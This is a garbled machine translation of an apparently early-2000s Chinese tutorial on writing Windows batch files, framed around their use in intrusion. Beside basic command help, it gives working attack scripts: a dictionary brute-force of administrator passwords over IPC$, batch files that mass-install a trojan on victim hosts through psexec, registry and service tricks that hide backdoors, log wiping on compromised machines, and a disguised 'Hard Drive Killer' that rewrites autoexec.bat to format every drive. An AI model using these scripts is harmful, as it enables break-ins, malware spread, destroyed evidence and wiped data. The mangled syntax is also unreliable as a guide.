Write the BAT file

xiaoxiao2021-03-17  193

Suddenly remembered the writing of the BAT file

So I went to the Internet.

Not a lot of content.

It seems that BAT is not very popular now -

Space.sf4u.net >>>>>

Foreword

Recently, for the discussion of batch technology, there are many good batch procedures release, but if there is no certain related knowledge, I am afraid it is not easy to understand and understand these batch files, but also can't talk about my hands-on, The ancient language cloud: "It is better to teach people to fish." Because the online seems to have no more complete textbooks, I wrote this "briefing batch tutorial>> gave new hands. Give all friends who have worked hard for the free and sharing of the network.

The batch file is a form of text file that contains one or more commands. Its file extension is .bat or .cmd. At the command prompt, the name of the approval file is submitted, or double-click the batch file, the system will call CMD.exe to run them one by one according to the order of each command in this file. Use batch files (also known as batch programs or scripts) to simplify daily or repetitive tasks. Of course, the main content of our version is to introduce some actual use in the invasion, such as the use of batch files to be mentioned later to make patch, bulk implant the latter procedures. Let's start our batch of learning trips.

1. Simple batch internal order profile

1.echo command

Open the echo or close the request back function, or display the message. If there is no parameters, the echo command will display the current echo setting.

grammar

echo [{on | OFF}] [Message]

Sample: @echo off / echo hello world

In practical applications, we will combine this command and redirect symbol (also known as pipe symbols, generally >> ^) to implement the input of some commands to specific formats. This will be embodied in the later example .

2. @ 令

Indicates that @ later commands, in the invasion process (for example, using batch to format the enemy's hard drive) naturally not let the other party see the command you use.

Sample: @echo off

@echo now initializing the program, please wait a minite ...

@format x: / q / u / autoset (format This command is not available / y this parameter, gratifying that Microsoft has left an Autoset parameter to us, the effects and / Y are the same.)

3.goto command

The specified jump to the label. After finding the label, the program will process the command starting from the next row.

Syntax: goto label (Label is the parameter, specifies the row in the batch program to be turned.)

SAMPLE:

IF {% 1} == {} GOTO NOPARMS

IF {% 2} == {} goto noparms (if you don't understand, you don't understand, you will have a detailed explanation.)

@Rem Check Parameters if Null show usage

: NopArms

Echo usage: Monitor.bat Serverip portnumber

Goto end

The name of the label can be random, but it is best to make a meaningful letter, let me add one: used to indicate that this letter is a label, and the goto command is based on this: to find the next step to jump there. It is best to have some explanation that you will understand your intentions.

4.Rem Command

Comment command, quite with / * in the C language -------- * /, which does not be executed, just a role of a comment, easy to read and modify it later. Rem message

Sample: @Rem Here Is The Description.

5.pause command

When you run the PAUSE command, the following message is displayed:

..

SAMPLE:

@echo off

: Begin

Copy a: *. * D: / back

Echo please put a new disk Into Driver A

PAUSE

Goto Begin

In this example, all files on the disk A in the drive A are copied to the D: / BACK. Display Note Tips When another disk is placed in the drive A, the PAUSE command will hang the program so that you can replace the disk and press any key to continue processing.

6.call command

Another batch program is called from a batch program and does not terminate the parent batch program. The call command accepts the label used as calling the target. If you use Call outside the script or batch file, it will not work on the command line.

grammar

Call [[Drive:] [PATH] FileName [BatchParameters]] [: label [arguments]]]]]

parameter

[Drive:} [PATH] FileName

Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension.

7.Start command

Call external programs, all DOS commands and command line programs can be called by the start command.

Intrusion common parameters:

MIN starts when the window is minimized

Separate starts 16-bit Windows programs within separate spaces

High at the High Priority Category Start Application

RealTime starts an application at the RealTime priority category

Wait launches the app and waits it over

Parameters These are parameters transmitted to command / programs

When the execution application is a 32-bit GUI application, the cmd.exe does not equal the application to terminate the command prompt. If executed within the command script, the new behavior will not happen.

8.choice command

Choice Use this command to allow users to enter a character to run different commands. When using, you should add / c: parameters, C: After you should write the prompt that the characters can be entered, there is no space. Its return code is 1234 ...

Such as: Choice / C: DME DEFRAG, MEM, END

Will display

DEFRAG, MEM, END [D, M, E]?

SAMPLE:

The contents of Sample.bat are as follows:

@echo off

Choice / C: DME DEFRAG, MEM, END

IF Errorlevel 3 Goto Defrag (should judge the highest value of the value first)

IF Errorlevel 2 Goto Mem

IF Errotlevel 1 goto end

: defrag

C: / DOS / DEFRAG

Goto end

: MEM

MEM

Goto end

: END: END

Echo good bye

After this file runs, the DEFRAG, MEM, END [D, M, E]? The user can select DME, then the IF statement will make a judgment, and D represents the block segment executing the label DEFRAG, and M represents the program that is labeled MEM. Segment, e represents a block that executes the label End, and each block is finally jumped to the END Number with Goto End, and then the program will display good Bye and the file ends.

9.if Command

The if indicates whether it is determined whether or not the specified condition is determined to determine the execution of different commands. There are three formats: 1, if "==" string "to be executed

If the parameter is equal to the specified string, the condition is established, run the command, otherwise run the next sentence. (Note is two equal numbers)

If IF "% 1" == "a" Format A:

IF {% 1} == {} GOTO NOPARMS

IF {% 2} == {} GOTO NOPARMS

2, if the ife file name to be executed

If you have a specified file, the condition is true, run the command, otherwise run the next sentence.

If exist config.sys edit config.sys

3, if ErrorleVel / if Not Errorlevel Digital Terminal To Perform

If the return code is equal to the specified number, the condition is established, run the command, otherwise run the next sentence.

If Errorlevel 2 Goto X2

The DOS program runs back a number to DOS, called error code errorlevel or returns, and the common return code is 0, 1.

10.FOR command

The for command is a complicated command, primarily for parameters to loop execute commands within the specified range.

When using the for command in the batch file, specify a variable, please use %% Variable

For {% variable | %% variable} in (set) do command [commandLineOptions]

% variable specifies a single letter replaceable parameter.

(SET) Specify one or a set of files. You can use wildcards.

Command specifies the command to execute each file.

Command-parameters specifies parameters or command line switches for a specific command.

When using the for command in the batch file, specify a variable, please use %% Variable

Not to use% Variable. The variable name is case sensitive, so% I is different from% i

If the command extension is enabled, the following additional for command format will be

stand by:

FOR / D% Variable in (SET) Do Command [Command-Parameters]

If the concentration contains a wildcard, specify matching with the directory name without matching the file name.

FOR / R [[DRIVE:] PATH]% Variable in (set) Do Command [Command "

Check the directory tree in [Drive:] Path to the root, point to the for statement in each directory. If there is no specified directory after / r, use the current directory. If the set is only one single point (.) Character, the directory tree is enumerated.

FOR / L% Variable in (Start, Step, End) Do Command [Command-Para

This set represents a digital sequence from the beginning to the end in incremental form.

Therefore, (1, 1, 5) will produce sequences 1 2 3 4 5, (5, -1, 1) will produce sequences (5 4 3 2 1)

FOR / F ["Options"]% Variable in (file-set) Do Command

FOR / F ["Options"]% variable in ("string") Do Command

FOR / F ["Options"]% variable in ('command') Do Command

Or, if there is a UseBackQ option:

FOR / F ["Options"]% Variable in (file-set) Do Command

FOR / F ["Options"]% variable in ("string") do commandfor / f ["options"]% variable in ('command') Do Command

Filenameset is one or more file names. Continue to Filenameset

Before the next file, each file has been opened, read and processed.

Processing includes reading a file, dividing it into a line of rows, and then

Analyze into zero or more symbols. Then use the symbol string variable value

Call the for loop. With the default, / f is separated from each line of each file

The first blank symbol. Skip blank lines. You can choose Options "by specifying

Parameter replacing the default parsing operation. This string with quotes includes one or more

Specify the keywords for different parsing options. These keywords are:

EOL = C - Refers to the end of a row bet release character (one)

Skip = n - refers to the number of rows ignored at the beginning of the file.

Delims = xxx - Indicator jacket set. This replacement space and jumping

Default separator set.

Tokens = x, y, m-n - means which symbols per line are passed to each iteration

For itself. This can cause the additional variable name

The format is a range. Specify M via NTH symbol

The last character in the symbol string is asterisk,

So extra variables will be parsed in the last symbol

Allocate and accept the retention text.

Usebackq - Specify new grammar has been used under the case:

Perform a back quoted string as a command and

Quatrical characters are text string commands and allowed in FI

Use dual quotes to expand the file name.

Sample1:

FOR / F "eol =; tokens = 2, 3 * delims =,"% i in (myfile.txt) do command

Will analyze each row in myfile.txt, ignore those rows that are headed by semicolons,

The second and third symbols in each row are passed to the For Prproduction; with a tune and / or

Space symbol symbol. Please note that the statement of this FOR program references% i

Take the second symbol, reference% J to get the third symbol, reference% K

To get all the remaining symbols after the third symbol. For files with spaces

Name, you need to enclose the file with double quotes. In this way

With double quotes, you also need to use the UseBackQ option, otherwise, the double quotes will

Understanding is used as a string that defines a certain analysis.

% i specifically in the For statement,% J and% K are passed

The tokens = option is specifically description. You can pass tokens = line

Specify up to 26 symbols, as long as you don't try to explain a higher than the letter 'Z' or

'Z' variable. Remember, for variables are single letters, case sensitive and global;

At the same time, there is no more than 52 or more.

You can also use FOR / F analysis logic on adjacent strings;

Enclose the filenameset between brackets with a single quotation. This way, this character

Plan will be regarded as a single input line in a file.

Finally, you can use the for / f command to analyze the output of the command. The method is

The filenameset between brackets becomes a hind string. This string will

It is regarded as a command line, passes to a sub-cmd.exe, and its output will be grasp

Memory and is used as a file analysis. Therefore, the following examples:

FOR / F "USEBACKQ DELIMS =="% i in (`set`) do @echo% i

Will enumerate the name of the environment variable in the current environment.

In addition, the replacement of the FOR variable reference has been enhanced. You can now use the following options for symptoms:

~ I - Delete any quotes ("), expand% i

% ~ Fi - expand% i to a fully qualified path name

% ~ Di - expand% i to a drive letter

% ~ Pi - expand% i to a path

% ~ Ni - expand% i to a file name

% ~ xi - expand% i to a file extension

% ~ Si - The extended path only contains a short name

% ~ AI - expand% i to file properties

% ~ Ti - expand% i to file date / time

% ~ zi - expand% i to the size of the file

% ~ $ PATH: I - Find the directory column of path environment variables and expand% i

The first completely qualified name found. If the environment variable

Not defined, or if the file is not found, this combination key will expand

Nicker

Multiple results can be combined to get multiple results:

% ~ DPI - expand% i to a drive letter and path

% ~ NXI - expand% i to a file name and extension

% ~ fsi - expand% i to a full path name with a short name

% ~ DP $ PATH: I - Find the directory column in the path environment variable and expand% i

To the first drive letter and path found.

% ~ ftzai - expand% i to Dir from similar output lines

In the above example,% I and PATH can be replaced with other effective values. % ~ Grammar

Terminate with an effective FOR variable name. Select a larger write variable name similar to% I

Read more readily, and avoid confusion with a combination of regardless of case.

The above is the official help of MS, let's take a few examples to specify the use of the for command in the invasion.

Sample2:

Use the for command to achieve the crack of violent password for a target Win2k host.

We use NET USE // IP / IPC $ "Password" / u: "administrator" to attempt to connect with the target host, and write a password when successful.

The most important order is a: FOR / F I% in (Dict.txt) Do Net USE // IP / IPC $ "I%" / u: "administrator"

Use I% to represent the password of Admin, this is connected to the value of the I% in Dict.txt. Then pass the program to run the result to the find command -

FOR / FI %% in (Dict.txt) DO NET USE // IP / IPC $ "I %%" / u: "Administrator" | Find ": command successfully complete" >> D: /ok.txt, so Ko.

Sample3:

Have you ever had a lot of broilers waiting for you to go to the back door Trojan? When the number is particularly, it will become very depressed when the number is very happy :). The opening of the article talked to the use of batch files to simplify daily or repetitive tasks. So how do you implement it? Oh, you will understand it.

The main order is only one: (when using the for command in the batch file, specify the variable using %% variable)

@for / f "tokens = 1, 2, 3 delims =" %% I in (Victim.txt) do start call door.bat %% i %% J %% K

For use, please refer to Sample1 above, where it represents the parameter% I% J% K in door.bat in order.

CultiVate.bat is nothing more than using the NET USE command to create an IPC $ connection, and COPY Trojan back door to Victim, then use the return code (if Errorlever =) to filter the host of the back door, and echo, or echo to the specified file. Delims = indicates that the content in Vivtim.txt is separated by a space. I want to see this here, you must also understand what is what this Victim.txt is like. It should be arranged in accordance with the object expressed by the %% I %% J %% K, which is generally IP Password UserName.

Code prototype:

--------------- Cut Here The Save As a Batchfile (I Call it main.bat) -------------------- -------

@echo off

@IF "% 1" == "" GOTO USAGE

@for / f "tokens = 1, 2, 3 delims =" %% i in (Victim.txt) do start call ipchack.bat %% i %% J %% K

@goto end

: USAGE

@echo run this bath in dos mode.or Just Double-Click IT.

: END: END

--------------- Cut Here The Save As a Batchfile (I Call it main.bat) -------------------- -------

------------------- Cut hered (i call it door.bat) ----------------------------------------------------------------------------------------------------------------------------------- -------------

@NET USE / /% 1 / IPC $% 3 / U: "% 2"

@if Errorlevel 1 Goto Failed

@echo trying to establish the ipc $ connection ............ ok

@copy windrv32.exe //% 1 / admin $ / system32 && if not errorlevel 1 echo ip% 1 user% 2 PWD% 3 >> KO.TXT

@PSexec //% 1 C: /Winnt/System32/Windrv32.exe

@PSEXEC / /% 1 NET Start Windrv32 && if Not Errorlevel 1 Echo% 1 Backdooored >> Ko.txt

: Failed

@echo sorry can not connect to the VICTIM.

----------------- Cut Here Ten Save as a batChfile (i call it door.bat) ------------------ ----------------

This is just a prototype, two batch and latte programs (Windrv32.exe), psexec.exe, need to be placed in a unified directory. Batch content

It cannsterately expand, for example, add the ability to clear the log DDOS, add the function of the timed to add the user, more deeper, can make it automatically propagated (worm). Not much narrative, interested friends can study.

II. How to use parameters in batch files

Parameters can be used in batches, usually from 1% to 9%, when there are multiple parameters, you need to move with Shift, this situation is not very common, we don't consider it.

Sample1: fomat.bat@echo off

IF "% 1" == "a" Format A:

: Format

@format a: / q / u / auotset

@echo please insert Another Disk to Driver A.

@pause

@goto fomat

This example is used to continuously format a few floppy disks, so you need to enter fomat.bat a at the DOS window when you use it, huh, it seems to have a bit drawing the snake to add ~ ^ _ ^

Sample2:

When we want to build an IPC $ Connection, you must always enter a big string command. If we can't get it wrong, we better write some fixed commands to a batch, put the broiler IP password username to assign it to the parameters. This batch, so you don't have to play a command every time.

@echo off

@NET USE / / 1% / IPC $ "2%" / u: "3%" Note Oh, this PASSWORD is the second parameter.

@if Errorlevel 1 Echo Connection Faled

How is it, use the parameters or simpler? You have learned to learn ^ _ ^.

3. How to use a combination command (Compound Command)

1.&

USAGE: The first command & second command [& Article 3 Commands ...]

Use this method to perform multiple commands at the same time, regardless of whether or not the command is successful

SAMPLE:

C: /> DIR Z: & DIR C: / EX4RCH

The System Cannot Find The path specified.

Volume in Drive C Has No Label.

Volume Serial Number IS 0078-59FB

Directory of C: / EX4RCH

.23:51

.

2002-05-14 23:51

..

2002-05-14 23:51 14 Sometips.gif

2.&&

USAGE: The first command && second order [&& Article 3 Commands ...]

In this way, multiple commands can be performed simultaneously. When you encounter an error, you will not perform the back command, if there is no error, you have been executed all commands;

SAMPLE:

C: /> DIR Z: && Dir C: / EX4RCH

The System Cannot Find The path specified.

C: /> DIR C: / EX4RCH && DIR Z:

Volume in Drive C Has No Label.

Volume Serial Number IS 0078-59FB

Directory of C: / EX4RCH

2002-05-14 23:55

.

2002-05-14 23:55

..

2002-05-14 23:55 14 Sometips.gif

1 File (s) 14 bytes

2 DIR (s) 768, 671, 744 bytes Free

The System Cannot Find The path specified.

This may be relatively simple when doing backups, such as:

Dir file: //192.168.0.1/database/backup.mdb && copy file: //192.168.0.1/database/backup.mdb E: / backup If there is a backup.mdb file on the remote server, if you do not There is no copy command to exist if the file is present. This usage can be replaced if exist :)

3. ||

USAGE: The first command || Second order [|| Article 3 Commands ...]

In this way, multiple commands can be performed simultaneously. When you encounter the correct command, you will not execute the back command. If you do not have a correct command, you have been executed all commands;

SAMPLE:

C: / EX4RCH> DIR Sometips.gif || Del Sometips.gif

Volume in Drive C Has No Label.

Volume Serial Number IS 0078-59FB

Directory of C: / EX4RCH

2002-05-14 23:55 14 Sometips.gif

1 File (s) 14 bytes

0 DIR (s) 768, 696, 320 bytes Free

Examples of combined commands:

SAMPLE:

@Copy Trojan.exe //% 1 / Admin $ / SYSTEM32 && IF NOT Errorlevel 1 Echo IP% 1 User% 2 Pass% 3 >> Victim.txt

Fourth, the use of pipeline orders

1.

USAGE: First Command | 2 Command [| Article 3 Commands ...]

Use the results of the first command as the parameters of the second command, remember this method in Unix is ​​very common.

SAMPLE:

Time / >D: /ip.log

Netstat -n -p TCP | FIND ": 3389" >> D: /ip.log

START Explorer

Did you see it? Used for Terminal Services Allows us to customize the starting program for users to achieve the following BAT to get the IP of the login user.

2.>, >> Output Redirection Command

Redirection of a command or a program output result to a specific file,> >> Differences in >>> >> Write the specified file after the content in the file, and >> will only add content to the designated In the file, the contents will not be changed.

Sample1:

Echo Hello World> C: / Hello.txt (stupid eXample?)

Sample2:

Now, the DLL Trojan is prevalent, and we know that SYSTEM32 is a good place to hide and seek. Many Trojans sharpened your head to drill there. DLL horses are no exception. For this, we can install the system and necessary applications, for this directory The lower EXE and DLL files make a record:

Run the CMD - Conversion Contents to System32 - Dir * .exe> ​​EXEBACK.TXT & DIR * .DLL> DLLBACK.TXT,

Such all the names of all EXE and DLL files are recorded in EXEBACK.TXT and DLLBACK.TXT, respectively.

If you find an exception, you can't find a problem with the traditional method, you should consider whether it has souseed in the DLL Trojan.

At this time, we use the same command to record the exe and dll files in System32 into additional ExeBack1.txt and dllback1.txt, then run:

CMD - FC EXEBACK.TXT EXEBACK1.TXT> DIFF.TXT & FC DLLBACK.TXT DLLBACK1.TXT> Diff.txt. (Compare the DLL and EXE files before and after comparing with the FC command, and enter the result into Diff.txt This, so we can find some more DLL and EXE files, and then easily determine if it is more important to be parallel by DLL Trojan by viewing the creation time, version, whether it is compressed, etc. No, if there is any words, don't drop it directly, first use the regsvr32 / u trojan.dll to remove the back door DLL file, move it to the recycle station, if the system does not exception reflection, then completely delete or Submit to anti-virus software. 3. <,> &, <&

> & To write the output of a handle to another handle.

<& Joint input from one handle and writes it to another handle output.

These are not commonly used, and there is not much introduction.

5. How to use the batch file to operate the registry

Implement a certain purpose of the specific key value of the operation registry during the intrusion process, for example, in order to reach the hidden back door, the Trojan deletes the residual key value under RUN. Or create a service to load the back door. Of course, we will also modify the registry to reinforce the system or change an attribute of the system, which requires us to have a certain understanding of the registry operation. Let's take a look at how to use the .reg file to operate the registry. (We can use batch to generate a REG file)

About the operation of the registry, common is to create, modify, delete.

Create

Create a division, one is to create a child (Subkey)

We create a file, the content is as follows:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / HACKER]

Then, the script is then executed, you have created a child name "Hacker" under HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft.

The other is to create a project name

The file format is a typical file format, which is consistent with the file format you exported from the registry:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run]

"Invader" = "ex4rch"

"Door" = c: //winnt/system32//door.exe

"Autodos" = DWORD: 02

This is in [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run]

Newly built: Invader, Door, About these three projects

The type of Invader is "String Value"

The type of Door is "Reg Sz Value"

Autodos type is "dword value"

2. Modify

Remodel is relatively simple, just export you need to modify, then modify it with Notepad, then import (regedit / s).

3. Delete

Let's first tell the delete a project name, we create a file as follows:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run]

"EX4RCH" = -

"EX4RCH" under this script, [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] is deleted; let's take a look at the delete one child, we create a script as follows:

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run]

Execute this script, [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] has been deleted.

I believe it is .reg files you have already mastered. Then the current goal is to use batch to create a .reg file, remember that our previous use of redirect symbols can easily create specific types of files.

SAMLPE1: As the example above, if you want to generate the following registry file

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run]

"Invader" = "ex4rch"

"door" = HEX: 255

"Autodos" = dword: 000000128

Just like this:

@echo windows registry Editor Version 5.00 >> Sample.REG

@echo [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run]> Sample.REG

@echo "infader" = "ex4rch" >> Sample.REG

@echo "door" = 5 >> c: //winnt/system32//door.exe >> Sample.REG

@echo "autodos" = dword: 02 >> Sample.REG

SAMLPE2:

When we use some old Trojans, we may generate a key value to realize the self-start of Trojans in [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run (Runonce, RunServices, Runexec)] in the registry. But this is easy to expose the path to Trojans, causing Trojans to be killing, relatively safely registered with the Trojan program as a system service. Below to configure the IRC Trojan DSNX as an example (named Windrv32.exe)

@start windrv32.exe

@attrib h r windrv32.exe

@echo [hkey_local_machine / Software / Microsoft / Windows / CurrentVersion / Run] >> Patch.dll

@echo "windsnx" = - >> Patch.dll

@ sc.exe create windriversrv type = kernel start = auto displayName = WindowsDriver binpath = c: /winnt/system32/windrv32.exe

@Regedit / s patch.dll

@Delete Patch.dll

@REM [Delete the startup item in the registry in the registry, and the SC.exe will be registered as the system key service, set its properties to hide and read only, and config is started from start] @Rem is not safer ^ _ ^.

Six. Wonderful instances are delivered.

1. Delete the batch of Win2K / XP system default sharing

------------------------ Cut Here the Save as .bat or .cmd file --------------- ----------------

@echo prepaling to delete all the default shares.when ready pres.

@pause

@echo off

: Rem Check Parameters if Null show usage.

IF {% 1} == {} GOTO: USAGE

: Rem Code Start.

echo.

Echo ------------------------------------------------------------------------------- -----

echo.

Echo Now deleneting all the default shares.

echo.

NET Share% 1 $ / Delete

NET Share% 2 $ / Delete

Net Share% 3 $ / Delete

Net Share% 4 $ / Delete

Net Share% 5 $ / Delete

Net Share% 6 $ / Delete

Net Share% 7 $ / Delete

Net Share% 8 $ / Delete

Net Share% 9 $ / Delete

NET STOP Server

Net Start Server

echo.

Echo all the shares, been deleteed

echo.

Echo ------------------------------------------------------------------------------- -----

echo.

Echo Now Modify The Registry to Change The System Default Properties.

echo.

Echo Now Creating The Registry File

Echo Windows Registry Editor Version 5.00> C: /DELSHARE.REG

Echo [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] >> C: /DELSHARE.REG

Echo "AutoSharewks" = dword: 00000000 >> C: /DELSHARE.REG

Echo "AutoShareserver" = dword: 00000000 >> C: /DELSHARE.REG

Echo Nowing Using The Registry File To Chang The System Default Properties.

Regedit / s C: /DELSHARE.REG

Echo Deleting The Temprotarily Files.

Del C: /DELSHARE.REG

Goto: End

: USAGE

echo.

Echo ------------------------------------------------------------------------------- -----

echo.

echo ☆ a example for bach file ☆

Echo ☆ [Use Batch File to Change The Sysytem Share Properties.] ☆

echo.

Echo Author: EX4RCHOR: EX4RCHO MAIL: EX4RCH@hotmail.com QQ: 1672602

echo.

echo error: not enough parameters

echo.

echo ☆ please enter the share disk you wanna delete ☆

echo.

Echo for instance, to delete the default shares:

Echo Delshare C D e ipc admin print

echo.

Echo if the disklable is not as c: D: E:, please chang it youserf.

echo.

Echo Example:

Echo if Locak Disklable Are C: D: E: X: Y: Z: YOULD CHANG THE Command INTO:

Echo delshare C D e x y z ipc admin print

echo.

echo *** you can delete nine shares on a useing ***

echo.

Echo ------------------------------------------------------------------------------- -----

Goto: EOF

: END: END

echo.

Echo ------------------------------------------------------------------------------- -----

echo.

Echo Ok, Delshare.bat Has Deleted All The Share You Assigned.

Echo.ny Questions, Feel Free To Mail To EX4RCH@hotmail.com.

echo

echo.

Echo ------------------------------------------------------------------------------- -----

echo.

: Eof

Echo end of the bath

------------------------ Cut Here the Save as .bat or .cmd file --------------- ----------------

2. Comprehensive reinforcement system (giving the broiler patch) batch document

------------------------ Cut Here the Save as .bat or .cmd file --------------- ----------------

@echo windows registry Editor Version 5.00> Patch.dll

@echo [HKEY_LOCAL_MACHINE / System / CurrentControlSet / Services / Lanmanserver / parameters] >> Patch.dll

@echo "autoshareserver" = DWORD: 00000000 >> Patch.dll

@echo "autosharewks" = dword: 00000000 >> Patch.dll

@Rem [forbidden sharing]

@echo [hkey_local_machine / system / currentControlset / Control / LSA] >> Patch.dll

@echo "restrictanonymous" = DWORD: 00000001 >> Patch.dll

@Rem [Disable anonymous login]

@echo [hkey_local_machine / system / currentcontrolset / services / net / parameters] >> patch.dll@echo "smbDeviceenabled" = DWORD: 00000000 >> Patch.dll

@Rem [Disable and File Access and Print Sharing]

@echo [hkey_local_machine / system / currentcontrolset / service / @ remoteregistry] >> Patch.dll

@echo "start" = dword: 00000004 >> Patch.dll

@echo [hkey_local_machine / system / currentcontrolset / services / schedule] >> Patch.dll

@echo "start" = dword: 00000004 >> Patch.dll

@echo [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows NT / CurrentVersion / Winlogon] >> Patch.dll

@echo "shutdownwithoutlogon" = "0" >> Patch.dll

@Rem [forbidden to shut down before login]

@echo "dontdisplaylastusername" = "1" >> Patch.dll

@Rem [Disabled Previous Login User Name]

@Regedit / s patch.dll

------------------------ Cut Here the Save as .bat or .cmd file --------------- ----------------

The following command is to clear all the logs of broilers, prohibit some dangerous services, and modify the Terminnal Service leaving the broiler.

@Regedit / s patch.dll

@NET STOP W3SVC

@NET Stop Event log

@Del C: / Winnt / System32 / logfiles / w3svc1 /*.* / f /

@Del C: / Winnt / System32 / logfiles / w3svc2 /*.* / f /

@Del C: / WinNT / System32 / Config / *. Event / F / Q

@Del C: / Winnt / System32dtClog /*.* / f /

@Del C: / Winnt / *. TXT / F / Q

@Del C: / WinNT / *. log / f / q

@NET START W3SVC

@NET Start Event Log

@Rem [Delete Log]

@NET Stop LanmanServer / Y

@NET Stop Schedule / Y

@NET Stop RemoteRegistry / Y

@del patch.dll

@echo the server has been patched, have fun.

@Del patch.bat

No distant service. ]

@echo [hkey_local_machine / system / currentcontrolset / control / terminal server / winstations / rdp-tcp] >> Patch.dll

@echo "portnumber" = dword: 00002010 >> Patch.dll@echo [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / CONTROL / TERMINAL SERVER / WDS / RDPWD / TDS / TCP >> Patch.dll

@echo "portnumber" = dword: 00002012 >> Patch.dll

@echo [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / TERMDD] >> Patch.dll

@echo "start" = dword: 00000002 >> Patch.dll

@echo [hkey_local_machine / system / currentcontrolset / services / secuser.com] >> Patch.dll

@echo "start" = dword: 00000002 >> Patch.dll

@echo "error" = DWORD: 00000001 >> Patch.dll

@echo "imagepath" = HEX (2): 25, 00, 53, 00, 79, 3, 3, 74, 100, 65, 6D, 00, 52, 100, 6F, 00, 6F, 00 , / >> Patch.dll

@echo 74, 00, 25, 00, 5C, 00, 53, 3, 65, 100, 6D, 00, 33, 100, 32, 100, 5C, 00, 65, / >> Patch.dll

@echo 00, 76, 100, 65, 00, 6E, 00, 67, 3, 2E, 00, 65, 3, 78, 100, 65, 100, 00, 00 >> Patch.dll

@echo "objectname" = "localsystem" >> Patch.dll

@echo "type" = dword: 00000010 >> Patch.dll

@echo "description" = "Keep Record of the program and windows' message." >> Patch.dll

@echo "displayname" = "Microsoft EventLog" >> Patch.dll

@echo [hkey_local_machine / system / currentcontrolset / services / termservice] >> Patch.dll

@echo "start" = dword: 00000004 >> Patch.dll

@copy c: /winnt/system32/Ermsrv.exe c: /winnt/system32/eventlog.exe

@REM [Modify 3389 connection, port is 8210 (hexadecimal 00002012), name is Microsoft Eventlog, retaining the retaining road]

3.Hard Drive Killer Pro Version 4.0 (playing batch to this level is not easy.)

------------------------ Cut Here the Save as .bat or .cmd file --------------- ------------ @ echo off

Rem this program is dedecated to a Very Special Person That Does not want to be named.

: start

CLS

Echo please Wait While Program Loads..

Call attrib -r -h c: /autoexec.bat> NUL

Echo @echo off> c: /autoexec.bat

Echo Call Format C: / Q / U / AutoSample> NUL >> C: /autoexec.bat

Call Attrib R H C: /autoexec.bat> NUL

Rem Drive Checking and Assigning The Valid Drives To The Drive Variable.

SET Drive =

Set alldrive = c d e f g h i j k L m N o P q r s t u v w x y z

Rem code Insertion for Drive Checking Takes Place Here.

Rem drivechk.bat is the file name under the root directory.

Rem as far as the drive detection and drive variable settings, don't worry about how it it

Rem Works, It's D / * AMN To Complicated for the average or even the excert batch programmer.

REM EXCEPT for Tom Lavedas.

Echo @echo off> drivechk.bat

Echo @Prompt %%%% COMSPEC %%%%% 1: $ b Find "Vol"> NUL> {t} .bat

% COMSPEC% / E: 2048 / c {t} .bat >> Drivechk.bat

Del {t} .bat

Echo if Errorlevel 1 Goto Enddc >> Drivechk.bat

CLS

Echo please Wait While Program Loads..

Rem When Errorlevel IS 1, THEN The Above Is Not True, IF 0, THEN'S TRUE.

Rem opposite of binary rules. If 0, IT WILL ELAPS to the Next Command.

Echo @Prompt %%%% COMSPEC %%%%% 1: .// AD / W / -P $ b Find "Bytes"> NUL> {T} .bat

% COMSPEC% / E: 2048 / c {t} .bat >> Drivechk.bat

Del {t} .bat

Echo if Errorlevel 1 Goto Enddc >> Drivechk.bat

CLS

Echo please Wait While Program Loads..

Rem if Errorlevel IS 1, THE DRIVE SPECified IS A Removable Media Drive - Not Ready.rem IF Errorlevel IS 0, The IT Will Elaps to the next Command.

Echo @Prompt DIR %%% 1: .// AD / W / -P $ b Find "0 bytes free"> NUL> {T} .bat

% COMSPEC% / E: 2048 / c {t} .bat >> Drivechk.bat

Del {t} .bat

Echo if ErrorLevel 1 set drive = %% drive %% %% 1 >> Drivechk.bat

CLS

Echo please Wait While Program Loads..

Rem if it's error is a hard or floppy drive.

Rem if it's not error is a cd-rom drive, Rem if it's not errorlevel 1, The specified drive.

Echo: Enddc >> Drivechk.bat

Rem Drive Checking Insertion Ends Here. "Enddc" Stands for "End DDRIVE CHECKING".

Rem now We will use the program drivechk.bat to attain valid drive information.

: SampledRV

For %% a in (% alldrive%) Do Call drivechk.bat %% a> NUL

Del Drivechk.bat> NUL

IF% drive. ==. set drive = c

: Form_Del

Call attrib -r -h c: /autoexec.bat> NUL

Echo @echo off> c: /autoexec.bat

Echo Echo Loading Windows, please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat

Echo for %%%% a in (% drive%) Do Call Format %%%% A: / Q / U / Autosample> NUL >> C: /autoexec.bat

Echo CLS >> C: /autoexec.bat

Echo Echo Loading Windows, please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat

Echo for %%%% a in (% drive%) Do Call C: /Temp.bat %%%% a bunga> NUL >> C: /autoexec.bat

Echo CLS >> C: /autoexec.bat

Echo Echo Loading Windows, please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat

Echo for %%%% a in (% drive%) Call deltree / y %%%% A: /> NUL >> C: / / /AUTOEXEC.BAT

Echo CLS >> C: /autoexec.Batecho Echo Loading Windows, Please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat

